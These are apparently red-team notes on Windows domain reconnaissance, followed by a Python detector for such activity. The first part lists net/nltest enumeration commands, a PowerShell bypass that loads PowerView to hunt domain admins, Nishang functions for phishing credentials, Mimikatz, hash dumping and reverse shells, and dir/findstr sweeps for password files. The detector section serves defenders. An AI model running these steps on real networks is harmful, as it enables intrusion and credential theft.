2024-07-12
Four situations:
1. Local user: user
2. Local administrator user: disabled in the Home edition, only available in the Server edition
3. Domain user
4. Domain administrator
Local users cannot obtain domain information.
Local administrator users can directly elevate their privileges to the system user (a domain user) and obtain domain information.
1. Determine whether a domain exists:
1. Check the domain: ipconfig /all, systeminfo, or net config workstation
ipconfig /all: found the domain: hack.com
systeminfo: found the domain: hack.com
2. Check the DNS host of the domain: nslookup domain name (hack.com)
3. net time /domain, which gives one of three outcomes:
The domain exists, but the current user is not a domain user
The domain exists and the current user is a domain user
The current network environment is a workgroup, and there is no domain
1. net view: display the domain list, the computer list, and the shared resources of a specified computer: net view (display the computer list); net view \\computer (view the shares of the specified computer)
net view /domain:domain name (hack) (display the computer list of that domain)
2. net user: view local users; net user /domain views the users in the domain
Add a user: net user name (admin) password (123) /add
3. net use: connect a computer to, or disconnect it from, a shared resource, and display the computer's connection information
4. net time: synchronize the time with a computer or a domain: net time \\computer, net time /domain
5. net start: start a service, or display the services that have been started: net start service
6. net pause: pause a running service: net pause service
7. net continue: reactivate a paused service: net continue service
8. net stop: stop a Windows NT/2000/2003 service: net stop service
9. net share: delete, create, or display shared resources
10. net session: list or disconnect the sessions between the local computer and the clients connected to it:
net session \\computer (identifies the computer whose session is listed)
net session \\computer /delete (disconnect the session of the specified computer)
11. net localgroup: view the computer's groups (local only): net localgroup username
Domain user: net localgroup username /domain
12. net group: query the names of the groups in the domain (domain controllers only): net group /domain
13. net config: display the currently running configurable services, or display and change the configuration of a service (local):
net config (displays a list of running services); net config services (displays a list of services)
14. net computer: add or delete computers in the domain database:
net computer \\computername /add or /del (add a computer to, or delete it from, the logon domain)
If the message "The server list for this workgroup is currently unavailable" appears, start the Server, Workstation and Computer Browser services and turn off the firewall.
Check domain: ipconfig/all or systeminfo or net config workstation
Check the DNS host of the domain: nslookup domain name (hack.com)
Query domain: net view /domain
Query all computers in the domain: net view /domain:domain name
Query the list of all user groups in the domain: net group /domain
Query the computer list of all domain members: net group "domain computers" /domain
Query domain password information: net accounts /domain
Get domain trust information: nltest /domain_trusts
Check the domain controller name: nltest /DCLIST:hack
Check the machine name, find the IP, ping/nslookup: ping/nslookup domain controller name
Sometimes ping is disabled, here use nslookup
Check the domain controller host name: nslookup -type=SRV _ldap._tcp
Check the current time: net time /domain
View the domain controller group: net group "Domain Controllers" /domain
1. Query user information in the domain: net user /domain
2. View local users: wmic useraccount get name; view domain users: wmic useraccount get domain,name
3. Check existing users: dsquery user (may not work sometimes, can only be run on the server machine)
4. Query the local administrator user group: net localgroup administrators
5. Query domain administrator users: net group "domain admins" /domain
6. Query the domain administrator user group: net group "Enterprise Admins" /domain
Two tools are needed here.
Upload the tool to the server first, then execute it.
1. PVEFindADUser: PVEFindADUser.exe -current (note the path). This tool shows which users have logged on to the computer, so that we can find the domain administrator.
2. PowerView script:
powershell.exe -exec bypass -command "& { import-module .\PowerView.ps1; Invoke-UserHunter }"
First check the execution policy: Get-ExecutionPolicy
Change the execution policy: Set-ExecutionPolicy Unrestricted (only with Unrestricted can PowerShell scripts be executed)
Nishang tool (download link in the previous article):
After placing it in the CS directory, import it directly: powershell-import nishang/nishang.psm1
Execute: PowerShell command
Some commonly used commands:
Check-VM: Check whether the host is a virtual machine
Invoke-CredentialsPhish: Trick the user into entering a password
Get-WLAN-Keys: Wi-Fi information
Invoke-Mimikatz: Grabbing Passwords
Get-PassHashes: Get the hash
Get-PassHints: Get the user's password hint information
Invoke-PowerShellTcp: Reverse shell
Invoke-PsUACme: Bypass UAC
Remove-Update: Remove patches
Get-Information: Local machine information
Example: PowerShell Check-VM
1. Collect various sensitive files in the specified directory
dir /a /s /b d:\*.txt
dir /a /s /b c:\*.xlsx
dir /a /s /b d:\*.md
dir /a /s /b d:\*.sql
dir /a /s /b d:\*.pdf
dir /a /s /b d:\*.docx
dir /a /s /b d:\*.doc
dir /a /s /b d:\*conf*
dir /a /s /b d:\*bak*
dir /a /s /b d:\*pwd*
dir /a /s /b d:\*pass*
dir /a /s /b d:\*login*
dir /a /s /b d:\*user*
2. Collect various account passwords from files in the specified directory
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
Example: dir /a /s /b d:\*.txt
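The domain-enumeration commands above (net ... /domain, nltest, the LDAP SRV lookup) and the dir/findstr sweeps for documents and credential keywords are exactly the command lines a defender wants to spot in process-creation telemetry. The following is an added example, not part of the original notes: a small Python detector that reads process-creation records in the style of Windows Security event 4688, classifies each command line against the patterns from these notes, and raises an alert when one host/user pair runs several distinct domain-enumeration commands or any credential-file search. The tab-separated record layout, the sample log lines and the alert threshold are all constructed assumptions for the example, not Microsoft's exact 4688 rendering.

```python
"""Flag domain-reconnaissance and credential-file-search command lines in
process-creation (Security event 4688 style) log records.

Added illustration; not code from the original notes. The log lines below are
constructed, and the field layout (host, user, NewProcessName, CommandLine
separated by tabs) is an assumed export format.
"""
import re
from collections import defaultdict

# Constructed sample records: "host\tuser\tNewProcessName\tCommandLine"
SAMPLE_LOG = """\
WS01\tHACK\\alice\tC:\\Windows\\System32\\ipconfig.exe\tipconfig /all
WS01\tHACK\\alice\tC:\\Windows\\System32\\net.exe\tnet view /domain:hack
WS01\tHACK\\alice\tC:\\Windows\\System32\\net.exe\tnet group "domain admins" /domain
WS01\tHACK\\alice\tC:\\Windows\\System32\\nltest.exe\tnltest /domain_trusts
WS01\tHACK\\alice\tC:\\Windows\\System32\\net.exe\tnet accounts /domain
WS02\tHACK\\bob\tC:\\Windows\\System32\\findstr.exe\tfindstr /si pass *.config *.ini *.txt
WS02\tHACK\\bob\tC:\\Windows\\System32\\cmd.exe\tdir /a /s /b d:\\*bak*
WS03\tHACK\\carol\tC:\\Windows\\System32\\net.exe\tnet use Z: \\\\fs01\\share
"""

# (category, human-readable label, pattern) for the command lines in the notes.
SIGNATURES = [
    ("domain_enum", "net <subcommand> ... /domain",
     re.compile(r'^net(?:\.exe)?\s+(?:view|user|group|accounts|time|localgroup)\b.*\s/domain\b', re.I)),
    ("domain_enum", "nltest trust / DC listing",
     re.compile(r'^nltest(?:\.exe)?\s+/(?:domain_trusts|dclist)', re.I)),
    ("domain_enum", "LDAP SRV record lookup",
     re.compile(r'^nslookup(?:\.exe)?\s+-type=srv\s+_ldap\._tcp', re.I)),
    ("credential_search", "findstr for credential keywords",
     re.compile(r'^findstr(?:\.exe)?\s+/si\s+(?:pass|pwd|userpwd|login|user)\b', re.I)),
    ("credential_search", "recursive dir for documents / config / credential names",
     re.compile(r'^dir\b.*\s/s\b.*(?:\*\.(?:txt|sql|md|pdf|docx?|xlsx)|\*(?:conf|bak|pwd|pass|login|user)\*)', re.I)),
]


def parse_record(line):
    """Split one tab-separated record into its four fields."""
    host, user, process, cmdline = line.rstrip("\n").split("\t", 3)
    return {"host": host, "user": user, "process": process, "cmdline": cmdline.strip()}


def classify(cmdline):
    """Return (category, label) for the first matching signature, else None."""
    for category, label, pattern in SIGNATURES:
        if pattern.search(cmdline):
            return category, label
    return None


def find_alerts(log_text, enum_threshold=3):
    """Group hits by (host, user) and emit alerts.

    enum_threshold (assumed value) is how many *distinct* domain-enumeration
    commands one principal must run before a burst alert is raised; a single
    credential-file search is enough on its own.
    """
    hits = defaultdict(lambda: {"domain_enum": [], "credential_search": []})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        match = classify(rec["cmdline"])
        if match:
            category, _label = match
            hits[(rec["host"], rec["user"])][category].append(rec["cmdline"])

    alerts = []
    for (host, user), cats in sorted(hits.items()):
        enum_cmds = cats["domain_enum"]
        cred_cmds = cats["credential_search"]
        if len(set(enum_cmds)) >= enum_threshold:
            alerts.append({"host": host, "user": user,
                           "reason": "domain enumeration burst", "commands": enum_cmds})
        if cred_cmds:
            alerts.append({"host": host, "user": user,
                           "reason": "credential file search", "commands": cred_cmds})
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(f"{alert['host']} {alert['user']}: {alert['reason']}")
        for cmd in alert["commands"]:
            print(f"    {cmd}")
```

Run against the constructed sample, WS01/alice produces a domain-enumeration burst (four distinct commands) and WS02/bob a credential-file-search alert, while carol's ordinary net use mapping on WS03 is not flagged. In a real deployment the same classifier would be fed from command-line auditing (4688 with command-line logging enabled, or Sysmon event 1), and the threshold and a time window would be tuned to the environment's normal administrative activity.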